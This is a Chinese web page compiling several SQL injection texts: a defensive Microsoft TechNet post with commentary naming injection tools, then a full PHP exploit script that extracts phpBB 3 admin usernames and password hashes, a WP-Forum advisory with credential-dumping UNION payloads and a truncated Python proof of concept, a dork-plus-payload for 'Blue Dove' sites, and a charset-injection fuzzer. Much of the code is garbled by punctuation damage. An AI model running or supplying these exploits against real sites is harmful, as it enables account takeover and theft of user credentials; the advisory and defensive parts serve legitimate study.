您现在的位置：首页 > 实用文 > 其他范文

[翻译]SQL Injection Attack

时间：2022-08-22 08:07:51 其他范文收藏本文下载本文

以下是小编收集整理的[翻译]SQL Injection Attack，本文共8篇，仅供参考，希望对大家有所帮助。

篇1：[翻译]SQL Injection Attack

译文作者：hackxi（www.hackxi.cn）

篇2：SQL Injection Attack (From Microsoft TechNet)

网路游侠的博客

来自TechNet的一篇文章，说实话，都流行了几年的东西了，现在突然当作宝贝一样

这几天看到很多地方开始推这样的文章，包括HP、包括Symantec、包括Microsoft……

早干什么去了？初中的小孩都会拿个工具扫描了、甚至可以手工写注入语句了……

我还是在某些地方加点标注吧，文章写的并不是那么完美……中文的是我添加的

by 网路游侠 www.youxia.org

(Special thanks to Neil Carpenter for helping out on this blog post)

Recent Trends

实际上，这个“最近的”趋势，已经有几年了，至少从就开始在国内广泛流行，是的，是那时候开始“广泛流行”，而在国外，已经流行好久了……

Beginning late last year, a number of websites were defaced to include malicious HTML ＜script＞ tags in text that was stored in a SQL database and used to generate dynamic web pages. These attacks began to accelerate in the first quarter of and are continuing to affect vulnerable web applications.

The web applications compromised share several commonalities:

Application uses classic ASP code

不但有ASP注入，PHP和JSP的注入也相当流行，甚至有些EXE文件都可以注入……过分？是的，事实就是这样！

Application uses a SQL Server database

MySQL和Oracle、DB/2数据也是一样的，不但是SQL Server，只要功能不是太烂并且号称“数据库”貌似都行

Application code generates dynamic SQL queries based on URI query strings (consoto.com/widgets.asp?widget=sprocket)

This represents a new approach to SQL injection (msdn.microsoft.com/en-us/library/ms161953.aspx). In the past, SQL injection attacks were targeted to specific web applications where the vulnerabilities and the structure of the underlying database were either known or discovered by the attacker. This attack differs because it has been abstracted such that it is possible to attack virtually any vulnerability that is present in an ASP page creating dynamic SQL queries from URI query strings. Additional technical details and a walkthrough of the specifics are available at blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx.

This attack does not exploit vulnerabilities in Windows, IIS, SQL Server, or other infrastructure code; rather, it exploits vulnerabilities in custom web applications running on this infrastructure. Microsoft has investigated these attacks thoroughly and determined that they are not related to any patched or 0-day vulnerabilities in Microsoft products. More information can be found at web-server-attacks.aspx“>blogs.technet.com/msrc/archive/2008/04/25/questions-about-web-server-attacks.aspx.

As indicated above, these attacks have been accelerating through the year. This would appear to be related to at least two factors. First, there is a malicious tool that is in the wild that automates this. SANS discusses that tool here -- isc.sans.org/diary.html?storyid=4294. The tool uses search engines to find vulnerable sites to SQL injection.

The second factor is that one or more malicious bots are now launching SQL injection attacks as a way of spreading the bot further. SecureWorks discusses an example at www.secureworks.com/research/threats/danmecasprox/.

Once a server has been defaced using this attack, it will begin including a malicious ＜script＞ tag pointing to a .js file. While the contents of these files differ, they all attempt to exploit various vulnerabilities including already-patched Microsoft vulnerabilities and vulnerable third-party ActiveX controls. Since these scripts are hosted independently, it is possible that the scripts can be changed rapidly to exploit new client vulnerabilities and can be easily tailored to target on a “per browser” basis.

不仅仅是.js文件，SQL注入攻击是利用程序自身的问题，得到一定权限后写入文件，有时候是.js、有时候是＜iframe＞、有时候甚至是.css文件，都是可以成功利用刷流量或者进行进一步攻击、获取肉鸡的！

IT/database administrators Recommendations

There are a number of things that IT administrators and database administrators should do to limit risk and respond to possible incidents on the code and infrastructure they manage:

Review IIS logs and database tables for signs of previous exploits

Since this exploit takes place via the URI query string, administrators can review IIS logs to find anomalous queries that may be attempts to exploit this. Information on how to do this manually is available at blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx. A sample of an automated tool is available at www.codeplex.com/Release/ProjectReleases.aspx?ProjectName=WSUS&ReleaseId=13436.

If IIS logs show that the server has possibly been exploited, the next step would be to inspect tables in databases that are used by the associated web applications, looking for ＜script＞ tags appended to cells in text columns.

NOTE: IIS servers should never run in production with logging disabled. While the storage and administration requirements of IIS logging can be significant, the lack of IIS logs makes it very difficult to respond to security incidents.

If running 3rd party code that uses a database back-end, consult ISV about susceptibility to SQL injection

In cases where 3rd party ASP web applications are being used, administrators should contact the application vendors to ensure that they are not susceptible to SQL injection attacks.

第三方的防止SQL注入攻击的产品很多，包括现在很多防火墙、IPS、专用的防注入防火墙都可以起到比较好的作用，另外也有防注入的脚本，过滤一些直接提交的SQL语句，比如：or、and、select、drop、insert等，就可以很有效的起到过滤作用，一般可以直接在conn.asp等数据库连接文件中调用，效果很明显，同样的，作者还是在说ASP应用，实际上几乎所有的语言都有这个问题！因为这个是数据库的特性！PHP、JSP都无一例外，甚至C、Pascal、Perl、Python等写的程序依然可以注入，因为这个是程序自身的问题，只要你愿意，你甚至可以用汇编写SQL注入的例子。以前有杂志曾经将结果EXE的注入，后来我自己也尝试过，成功构造语句进入了一个需要密码才能进入的EXE程序

Validate that the account(s) that are used from the web application have least possible privilege in the database

Administrators should make sure that the SQL users that the web application uses have the least privilege necessary. Web applications should never connect as users with administrative privilege such as “sysadmin” at the server level or “db_owner” at the database level. The white paper “best practices for setting up and maintaining security in SQL Server 2005” download.microsoft.com/download/8/5/e/85eea4fa-b3bb-4426-97d0-7f7151b2011c/SQL2005SecBestPract.doc provides recommendations for various aspects of SQL server security.

Web developers Recommendations

There are several good documents on how Web developers can prevent SQL injection attacks when writing code. Since these attacks leverage vulnerable web application code, the only way to completely prevent them is to resolve vulnerabilities in the code. Any place that the code dynamically generates a SQL query using data from an external source (and, particularly, from a URI query string) should be considered suspect. Once code vulnerabilities are identified, they need to be carefully resolved.

Explained C SQL Injection, ASP.NET, ADO.NET:

msdn.microsoft.com/en-us/library/bb671351.aspx

Also, the above document contains a pointer to the following article “How To: Protect From SQL Injection in ASP.NET” msdn.microsoft.com/en-us/library/ms998271.aspx (which still applies to ASP)

A very useful video can be found here (this is the video refer on the previous article, but that link is currently broken): channel9.msdn.com/wiki/default.aspx/SecurityWiki.SQLInjectionLab

Generic information about how SQL Injection works:

msdn.microsoft.com/en-us/library/ms161953.aspx

SQL injections in ASP code (this is different from ASP.NET!):

msdn.microsoft.com/en-us/library/cc676512.aspx

How to call SQL Server stored procedures from ASP:

support.microsoft.com/kb/q164485

The Microsoft Security Development Lifecycle (SDL) has specific guidance to defend against SQL injection. In simple terms there are three different strategies to eradicate SQL Injection attacks:

Using SQL parameterized queries

Using stored procedures

Using SQL execute-only permissions

Michael Howard covers those topics in blogs.msdn.com/sdl/archive/2008/05/15/giving-sql-injection-the-respect-it-deserves.aspx

Also, Writing Secure Code 2nd has good guidance on how to prevent these type of attacks as well (see pages 399-411)

SQL Injection Mitigation: Using Parameterized Queries (Part 1 & 2). The advantage of using parameterized queries is that it separates the executable code (ie, the SELECT statement) from the data (the dynamic information supplied by the application’s user). This approach prevents any malicious statements passed along by the user from executing.

Part 1: blogs.technet.com/neilcar/archive/2008/05/21/sql-injection-mitigation-using-parameterized-queries.aspx

Part 2: blogs.technet.com/neilcar/archive/2008/05/23/sql-injection-mitigation-using-parameterized-queries-part-2-types-and-recordsets.aspx

Filtering SQL injection form. Classic ASP code (or blacklisting keywords), we considered the below as temporary workarounds since in reality it does not fix the root cause of the bugs (i.e. the code is still vulnerable and it might be reachable even after the filtering)

Nazim from the IIS team explains how to do the filtering in detail here: blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx

If you are still not sure where to start, all web code that accesses a database with a particular focus on ASP code and areas of code which use user-supplied data should be review first.

End User Recommendations

End users should review the information at www.microsoft.com/protect/default.mspx; in addition, here are some specific steps that you can take to protect yourself.

As always, browse responsibly ― but be aware that this could also affect websites that the user trusts

While responsible browsing limits your exposure to vulnerability, it is possible that even websites you trust may have been compromised. Watch for unusual behavior, be aware of the risk, and implement the other recommendations in this section.

Keep up to date on security updates, both Microsoft and 3rd party

Since the malicious scripts are exploiting known vulnerabilities, you should make sure that you are running the latest Microsoft and 3rd party security updates. Microsoft security updates are available via update.microsoft.com. Additional information is available at www.microsoft.com/protect/computer/updates/OS.aspx.

Disable unneeded ActiveX controls and Internet Explorer add-ons

You should disable any unneeded ActiveX controls and add-ons in Internet Explorer. To do this on Windows XP Service Pack 2 or later, follow these steps from KB883256 (support.microsoft.com/kb/883256):

1. Start Internet Explorer.

2. On the Tools menu, click Manage Add-ons.

3. Click the name of the add-on.

4. Use one of the following methods:

• Click Update ActiveX to replace the add-on with the current version. This option is not available for all add-ons.

• To enable an add-on, click Enable, and then click OK.

• To disable an add-on, click Disable, and then click OK.

You may have to restart Internet Explorer for the changes to take effect after you enable or disable an add-on.

For earlier operating systems, follow the instructions in KB154036 (support.microsoft.com/kb/154036).

Take steps to reduce attack surface of 3rd party browsers if you are using them

If you are using an Internet browser other than Internet Explorer, you should ensure that you have installed the latest security updates and that you disable unneeded extensions and add-ons. Information for popular browsers can be found at:

Firefox - support.mozilla.com/en-US/kb/Firefox+Support+Home+Page

Opera - www.opera.com/support/

Safari - www.apple.com/support/safari/

Run up-to-date anti-malware software

End users should ensure that they have anti-virus and anti-spyware software installed and that it is up to date. More information can be found at www.microsoft.com/protect/computer/antivirus/OS.aspx and www.microsoft.com/protect/computer/antispyware/OS.aspx. You can get a 90-day trial copy of Windows Live OneCare anti-virus/anti-spyware software at onecare.live.com/standard/en-us/install/install.htm.

- Security Vulnerability Research & Defense Bloggers

*Postings are provided ”AS IS“ with no warranties, and confers no rights.*

Published Thursday, May 29, 2008 10:20 PM by swiblog

Filed under: Injection, SQL, Attack

blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx

后面的很多不想添加了，前面说的差不多了

注入是程序员在写程序的时候过滤不严格导致的安全问题

和语言无关、和数据库类型无关

最好的防范手段是找个安全意识好的程序员

写程序的时候不要片面追求功能，因为功能永远和安全成反比

如果可能，购买相关软件或硬件产品进行防范

当然，安全配置也相当的重要

万一被攻克了，至少能防止权限被进一步提升

如果你想检测自己的网站是不是也有这样的问题

可以尝试下列几个工具：

NBSI、啊D注入工具、明小子的Domain、CASI 注射器、HDSI

新版本的X-Scan也行

商业的有WebRavor、SSS、榕基RJ-iTop、绿盟极光、Venus天镜

篇3：phpBB 3.0 SQL Injection

#!/usr/bin/php -q -d short_open_tag=on

echo ”PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosuren“;

echo ”by rgod rgod@autistici.orgn“;

echo ”site: retrogod.altervista.orgn“;

echo ”dork, version specific: “Powered by phpBB * , phpBB Group”nn“;

works regardless of php.ini settings

you need a global moderator account with ”simple moderator“ role

if ($argc<5) {

echo ”Usage: php “.$argv[0].” host path user pass OPTIONSn“;

echo ”host: target server (ip/hostname)n“;

echo ”path: path to phpbb3n“;

echo ”user/pass: u need a valid user account with global moderator rightsn“;

echo ”Options:n“;

echo ” -T[prefix] specify a table prefix different from default (phpbb_)n“;

echo ” -p[port]: specify a port other than 80n“;

echo ” -P[ip:port]: specify a proxyn“;

echo ” -u[number]: specify a user id other than 2 (admin)n“;

echo ” -x: disclose table prefix through error messagesn“;

echo ”Example:rn“;

echo ”php “.$argv[0].” localhost /phpbb3/ rgod suntzu-u-urn“;

echo ”php “.$argv[0].” localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7n“;

die;

}

error_reporting(0);

ini_set(”max_execution_time“,0);

ini_set(”default_socket_timeout“,5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=” .“;}

else

{$result.=” “.$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=” “.dechex(ord($string[$i]));}

else

{$exa.=” 0“.dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.=”rn“; $exa.=”rn“;}

}

return $exa.”rn“.$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo ”Connecting to “.$parts[0].”:“.$parts[1].” proxy...rn“;

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

fclose($ock);

#debug

#echo ”rn“.$html;

}

$host=$argv[1];

$path=$argv[2];

$user=$argv[3];

$pass=$argv[4];

$port=80;

$prefix=”PHPBB_“;

$user_id=”2“;//admin

$discl=0;

$proxy=”“;

for ($i=3; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp==”-p“)

{

$port=str_replace(”-p“,”“,$argv[$i]);

}

if ($temp==”-P“)

{

$proxy=str_replace(”-P“,”“,$argv[$i]);

}

if ($temp==”-T“)

{

$prefix=str_replace(”-T“,”“,$argv[$i]);

}

if ($temp==”-u“)

{

$user_id=str_replace(”-u“,”“,$argv[$i]);

}

if ($temp==”-x“)

{

$discl=1;

}

if (($path[0]'/') or ($path[strlen($path)-1]'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p=''.$host.':'.$port.$path;}

$data=”username=“.urlencode($user);

$data.=”&password=“.urlencode($pass);

$data.=”&redirect=index.php“;

$data.=”&login=Login“;

$packet=”POST “.$p.”ucp.php?mode=login HTTP/1.0rn“;

$packet.=”Referer: $host$path/ucp.php?mode=loginrn“;

$packet.=”Content-Type: application/x-www-form-urlencodedrn“;

$packet.=”Accept-Encoding: text/plainrn“;

$packet.=”Host: “.$host.”rn“;

$packet.=”Content-Length: “.strlen($data).”rn“;

$packet.=”Connection: Closernrn“;

$packet.=$data;

sendpacketii($packet);

$cookie=”“;

$temp=explode(”Set-Cookie: “,$html);

for ($i=1; $i<=count($temp)-1; $i++)

{

$temp2=explode(” “,$temp[$i]);

$cookie.=” “.$temp2[0];

}

if (eregi(”_u=1;“,$cookie))

{

//echo $html.”n“;//debug

//die(”Unable to login...“);

}

echo ”cookie -> “.$cookie.”rn“;

if ($discl)

{

$sql=”'suntzuuuuu“;

echo ”sql -> “.$sql.”n“;

$sql=urlencode(strtoupper($sql));

$data=”username=“;

$data.=”&icq=“;

$data.=”&email=“;

$data.=”&aim=“;

$data.=”&joined_select=lt“;

$data.=”&joined=“;

$data.=”&yahoo=“;

$data.=”&active_select=lt“;

$data.=”&active=“;

$data.=”&msn=“;

$data.=”&count_select=eq“;

$data.=”&count=“;

$data.=”&jabber=“;

$data.=”&sk=c“;

$data.=”&sd=a“;

$data.=”&ip=“.$sql;

$data.=”&search_group_id=0“;

$data.=”&submit=Search“;

$packet=”POST “.$p.”memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn“;

$packet.=”Content-Type: application/x-www-form-urlencodedrn“;

$packet.=”Host: “.$host.”rn“;

$packet.=”Content-Length: “.strlen($data).”rn“;

$packet.=”Connection: Closern“;

$packet.=”Cookie: “.$cookie.” rnrn“;

$packet.=$data;

sendpacketii($packet);

if (strstr($html,”You have an error in your SQL syntax“))

{

$temp=explode(”posts“,$html);

$temp2=explode(” “,$temp[0]);

$prefix=strtoupper($temp2[count($temp2)-1]);

echo ”prefix -> “.$prefix.”n“;sleep(2);

}

$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;$password=”“;

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

$sql=”1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,“.$j.”,1))=$i),$user_id,-1) FROM “.$prefix.”USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM “.$prefix.”POSTS WHERE POSTER_IP IN ('1.1.1.999“;

echo ”sql -> “.$sql.”n“;

$sql=urlencode(strtoupper($sql));

$data=”username=“;

$data.=”&icq=“;

$data.=”&email=“;

$data.=”&aim=“;

$data.=”&joined_select=lt“;

$data.=”&joined=“;

$data.=”&yahoo=“;

$data.=”&active_select=lt“;

$data.=”&active=“;

$data.=”&msn=“;

$data.=”&count_select=eq“;

$data.=”&count=“;

$data.=”&jabber=“;

$data.=”&sk=c“;

$data.=”&sd=a“;

$data.=”&ip=“.$sql;

$data.=”&search_group_id=0“;

$data.=”&submit=Search“;

$packet=”POST “.$p.”memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn“;

$packet.=”Content-Type: application/x-www-form-urlencodedrn“;

$packet.=”Host: “.$host.”rn“;

$packet.=”Content-Length: “.strlen($data).”rn“;

$packet.=”Connection: Closern“;

$packet.=”Cookie: “.$cookie.” rnrn“;

$packet.=$data;

sendpacketii($packet);

if (!strstr($html,”No members found for this search criteria“)) {$password.=chr($i);echo ”password -> “.$password.”[???]rn“;sleep(2);break;}

}

if ($i==255) {die(”Exploit failed...“);}

}

$j++;

}

$j=1;$admin=”“;

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$sql=”1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,“.$j.”,1))=$i),$user_id,-1) FROM “.$prefix.”USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM “.$prefix.”POSTS WHERE POSTER_IP IN ('1.1.1.999“;

echo ”sql -> “.$sql.”n“;

$sql=urlencode(strtoupper($sql));

$data=”username=“;

$data.=”&icq=“;

$data.=”&email=“;

$data.=”&aim=“;

$data.=”&joined_select=lt“;

$data.=”&joined=“;

$data.=”&yahoo=“;

$data.=”&active_select=lt“;

$data.=”&active=“;

$data.=”&msn=“;

$data.=”&count_select=eq“;

$data.=”&count=“;

$data.=”&jabber=“;

$data.=”&sk=c“;

$data.=”&sd=a“;

$data.=”&ip=“.$sql;

$data.=”&search_group_id=0“;

$data.=”&submit=Search“;

$packet=”POST “.$p.”memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn“;

$packet.=”Content-Type: application/x-www-form-urlencodedrn“;

$packet.=”Host: “.$host.”rn“;

$packet.=”Content-Length: “.strlen($data).”rn“;

$packet.=”Connection: Closern“;

$packet.=”Cookie: “.$cookie.” rnrn“;

$packet.=$data;

sendpacketii($packet);

if (!strstr($html,”No members found for this search criteria“)) {$admin.=chr($i);echo ”password -> “.$admin.”[???]rn“;sleep(2);break;}

}

if ($i==255) {die(”Exploit failed...“);}

$j++;

}

echo ”--------------------------------------------------------------------rn“;

echo ”admin -> “.$admin.”rn“;

echo ”password (md5) -> “.$password.”rn“;

echo ”--------------------------------------------------------------------rn“;

function is_hash($hash)

{

if (ereg(”^[a-f0-9]{32}“,trim($hash))) {return true;}

else {return false;}

}

if (is_hash($password)) {echo ”Exploit succeeded...“;}

else {echo ”Exploit failed...“;}

篇4：WPForum <= 2.3 SQL Injection

=============================================

INTERNET SECURITY AUDITORS ALERT -010

- Original release date: September 28th, 2009

- Last revised: December 15th, 2009

- Discovered by: Juan Galiana Lara

- CVE ID: CVE-2009-3703

- Severity: 8.5/10 (CVSS Base Score)

=============================================

I. VULNERABILITY

-------------------------

WP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities

II. BACKGROUND

-------------------------

WP-Forum is a discussion forum plugin for WordPress. It works with

WordPress 2+ version and PHP >= 5.0

III. DESCRIPTION

-------------------------

WP-Forum fails to sanitized user supplied input and is vulnerable to

SQL Injection and Blind SQL Injection. An attacker can obtain any data

of the database including user logins and passwords of the WordPress

installation, allowing him to obtain access to the application and

gain administration privileges.

For the SQL Injection vulnerability, is possible to concatenate other

sql requests via ”union select“ sentence. The parameters ”search_max“

and ”forum“ are affected by this flaw.

Snippet of vulnerable code:

In wpf.class file:

1836 $option_max_days = $_POST[search_max]; // <- this

line is not being sanitized

1837 $option_forums = $_POST[forum];

1838 if(!$option_max_days)

1839 $option_max_days = 9999;

1840 $op .= ” AND $this->t_posts.`date` > SUBDATE(CURDATE,

INTERVAL $option_max_days DAY) “;

1841

...

1850 foreach((array)$option_forums as $f)

1851 $a .= $f.”,“; // <- <- this lines is not being

sanitized

1852

1853 $a = substr($a, 0, strlen($a)-1 );

1854 if(!$a)

1855 $w = ”“;

1856 else

1857 $w = ”IN($a)“;

1858

1859 $sql = ”SELECT $this->t_threads.parent_id as pt,

$this->t_posts.id, text, $this->t_posts.subject,

$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST

($search_string) AS score

1860 FROM $this->t_posts inner join $this->t_threads on

$this->t_posts.parent_id = $this->t_threads.id

1861 WHERE $this->t_threads.parent_id $w

1862 AND MATCH (text) AGAINST ($search_string) $op“;

In the case of the Blind SQL Injection, the vulnerable code is...

In wpf-post.php file:

57 $id = $_GET[id]; // <- $_GET[id] is directly assigned

58 $thread = $this->check_parms($_GET[t]);

60 $out .= $this->header();

62 $post = $wpdb->get_row(”SELECT * FROM $wpforum->t_posts WHERE

id = $id“); // <- id is used without clean up

other example:

1490 function remove_post(){

1491 global $user_level, $user_ID, $wpdb;

1492 $id = $_GET[id]; // <- $_GET[id] is directly assigned

1493 $author = $wpdb->get_var(”SELECT author_id from

$this->t_posts where id = $id“); // id is used without clean up

...

1503 if($del == ”ok“){

1504 $wpdb->query(”DELETE FROM $this->t_posts WHERE id

= $id“); <- // id is used without clean up

1505 $this->o .= ”“.__(”Post

deleted“, ”wpforum“).”“;

1506 }

1507 else

1508 wp_die(__(”Cheating, are we?“, ”wpforum“));

1509

1510 }

the ”id“ parameter is vulnerable in other parts of the source code..

Also, is possible to delete all records in table $this->t_posts and

$this->t_threads because $_GET[topic] is not properly sanitized,

injecting something like 1 or 1=1

1479 function remove_topic(){

1480 global $user_level, $user_ID, $wpdb;

1481 $topic = $_GET[topic];

1482 if($this->is_moderator($user_ID, $this->current_forum)){

1483 $wpdb->query(”DELETE FROM $this->t_posts WHERE

parent_id = $topic“);

1484 $wpdb->query(”DELETE FROM $this->t_threads WHERE

id = $topic“);

1485 }

1486 else

1487 wp_die(__(”Cheating, are we?“, ”wpforum“));

1488

1489 }

IV. PROOF OF CONCEPT

-------------------------

In the url: example.com/blog/?page_id=3&wpforumaction=search

replacing page_id=3 parameter with the number of the WP-Forum page

in each case

Is possible to obtain any data of the database. Here is a proof of

concept to obtain user_pass, user_login and user_email of the user

with id=1 of wp_users table (normally admin).

We have to fill the search_max parameter with the value:

9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1

and subdate(curdate(), interval 9999

9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1

and subdate(curdate(), interval 9999

9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1

and subdate(curdate(), interval 9999

I wrote a PoC, to get automatically the password hash of the WordPress

admin account:

user@linuz:~$ cat wpforum2.3-poc.py

#!/usr/bin/python

# WP-Forum <= 2.3 SQL Injection PoC

# Juan Galiana Lara

# Internet Security Auditors

import urllib

import urllib2

import re

url = site//wordpress/?page_id=3&wpforumaction=search

values = {search_words : any,

search_submit : Search,

search_max : 999 DAY) union select 1,1,1,user_pass,1,1,1

from wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999 }

data = urllib.urlenco

篇5：Blue Dove Sql Injection Vulnerability

google : powered by Blue Dove Web Design

Exploit :server/path/file.php?id=null[SQL]

Example:

server/sections/newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14

篇6：SQL Injection Encoding Attacks fuzzer.php

我的测试结果，代码在结果后面，：

引用

Array

(

[big5] => Array

(

[161] => 2

[162] => 2

[163] => 2

[164] => 2

[165] => 2

[166] => 2

[167] => 2

[168] => 2

[169] => 2

[170] => 2

[171] => 2

[172] => 2

[173] => 2

[174] => 2

[175] => 2

[176] => 2

[177] => 2

[178] => 2

[179] => 2

[180] => 2

[181] => 2

[182] => 2

[183] => 2

[184] => 2

[185] => 2

[186] => 2

[187] => 2

[188] => 2

[189] => 2

[190] => 2

[191] => 2

[192] => 2

[193] => 2

[194] => 2

[195] => 2

[196] => 2

[197] => 2

[198] => 2

[199] => 2

[200] => 2

[201] => 2

[202] => 2

[203] => 2

[204] => 2

[205] => 2

[206] => 2

[207] => 2

[208] => 2

[209] => 2

[210] => 2

[211] => 2

[212] => 2

[213] => 2

[214] => 2

[215] => 2

[216] => 2

[217] => 2

[218] => 2

[219] => 2

[220] => 2

[221] => 2

[222] => 2

[223] => 2

[224] => 2

[225] => 2

[226] => 2

[227] => 2

[228] => 2

[229] => 2

[230] => 2

[231] => 2

[232] => 2

[233] => 2

[234] => 2

[235] => 2

[236] => 2

[237] => 2

[238] => 2

[239] => 2

[240] => 2

[241] => 2

[242] => 2

[243] => 2

[244] => 2

[245] => 2

[246] => 2

[247] => 2

[248] => 2

[249] => 2

)

[sjis] => Array

(

[129] => 2

[130] => 2

[131] => 2

[132] => 2

[133] => 2

[134] => 2

[135] => 2

[136] => 2

[137] => 2

[138] => 2

[139] => 2

[140] => 2

[141] => 2

[142] => 2

[143] => 2

[144] => 2

[145] => 2

[146] => 2

[147] => 2

[148] => 2

[149] => 2

[150] => 2

[151] => 2

[152] => 2

[153] => 2

[154] => 2

[155] => 2

[156] => 2

[157] => 2

[158] => 2

[159] => 2

[224] => 2

[225] => 2

[226] => 2

[227] => 2

[228] => 2

[229] => 2

[230] => 2

[231] => 2

[232] => 2

[233] => 2

[234] => 2

[235] => 2

[236] => 2

[237] => 2

[238] => 2

[239] => 2

[240] => 2

[241] => 2

[242] => 2

[243] => 2

[244] => 2

[245] => 2

[246] => 2

[247] => 2

[248] => 2

[249] => 2

[250] => 2

[251] => 2

[252] => 2

)

[gbk] => Array

(

[129] => 2

[130] => 2

[131] => 2

[132] => 2

[133] => 2

[134] => 2

[135] => 2

[136] => 2

[137] => 2

[138] => 2

[139] => 2

[140] => 2

[141] => 2

[142] => 2

[143] => 2

[144] => 2

[145] => 2

[146] => 2

[147] => 2

[148] => 2

[149] => 2

[150] => 2

[151] => 2

[152] => 2

[153] => 2

[154] => 2

[155] => 2

[156] => 2

[157] => 2

[158] => 2

[159] => 2

[160] => 2

[161] => 2

[162] => 2

[163] => 2

[164] => 2

[165] => 2

[166] => 2

[167] => 2

[168] => 2

[169] => 2

[170] => 2

[171] => 2

[172] => 2

[173] => 2

[174] => 2

[175] => 2

[176] => 2

[177] => 2

[178] => 2

[179] => 2

[180] => 2

[181] => 2

[182] => 2

[183] => 2

[184] => 2

[185] => 2

[186] => 2

[187] => 2

[188] => 2

[189] => 2

[190] => 2

[191] => 2

[192] => 2

[193] => 2

[194] => 2

[195] => 2

[196] => 2

[197] => 2

[198] => 2

[199] => 2

[200] => 2

[201] => 2

[202] => 2

[203] => 2

[204] => 2

[205] => 2

[206] => 2

[207] => 2

[208] => 2

[209] => 2

[210] => 2

[211] => 2

[212] => 2

[213] => 2

[214] => 2

[215] => 2

[216] => 2

[217] => 2

[218] => 2

[219] => 2

[220] => 2

[221] => 2

[222] => 2

[223] => 2

[224] => 2

[225] => 2

[226] => 2

[227] => 2

[228] => 2

[229] => 2

[230] => 2

[231] => 2

[232] => 2

[233] => 2

[234] => 2

[235] => 2

[236] => 2

[237] => 2

[238] => 2

[239] => 2

[240] => 2

[241] => 2

[242] => 2

[243] => 2

[244] => 2

[245] => 2

[246] => 2

[247] => 2

[248] => 2

[249] => 2

[250] => 2

[251] => 2

[252] => 2

[253] => 2

[254] => 2

)

[ucs2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT * FROM ucs2_users WHERE username = 'ÿ' OR 1=1 /* ' AND password = 'any' at line 1

[cp932] => Array

(

[129] => 2

[130] => 2

[131] => 2

[132] => 2

[133] => 2

[134] => 2

[135] => 2

[136] => 2

[137] => 2

[138] => 2

[139] => 2

[140] => 2

[141] => 2

[142] => 2

[143] => 2

[144] => 2

[145] => 2

[146] => 2

[147] => 2

[148] => 2

[149] => 2

[150] => 2

[151] => 2

[152] => 2

[153] => 2

[154] => 2

[155] => 2

[156] => 2

[157] => 2

[158] => 2

[159] => 2

[224] => 2

[225] => 2

[226] => 2

[227] => 2

[228] => 2

[229] => 2

[230] => 2

[231] => 2

[232] => 2

[233] => 2

[234] => 2

[235] => 2

[236] => 2

[237] => 2

[238] => 2

[239] => 2

[240] => 2

[241] => 2

[242] => 2

[243] => 2

[244] => 2

[245] => 2

[246] => 2

[247] => 2

[248] => 2

[249] => 2

[250] => 2

[251] => 2

[252] => 2

)

error_reporting(E_ALL);

//先设置为1创建数据库及表，然后设置为0test

$switch = 0;

$mysqlhost = 'localhost';

$mysqluser = 'root';

$mysqlpass = 'root'; // :p

$c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);

//Old versions of PHP don't have this function, so you need to create the database manually.

if ($switch == 1) {

print ”Creating database.....“;

mysql_create_db (”fuzz“, $c);

print ”Done!

n“;

}

mysql_select_db(”fuzz“, $c);

$charsets = mysql_query(”SHOW CHARACTER SET“, $c);

mysql_close ($c);

if ($switch == 1) {

print ”Creating tables.....

n“;

}

while ($row = mysql_fetch_row($charsets)) {

print $row[0].”....“;

$c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);

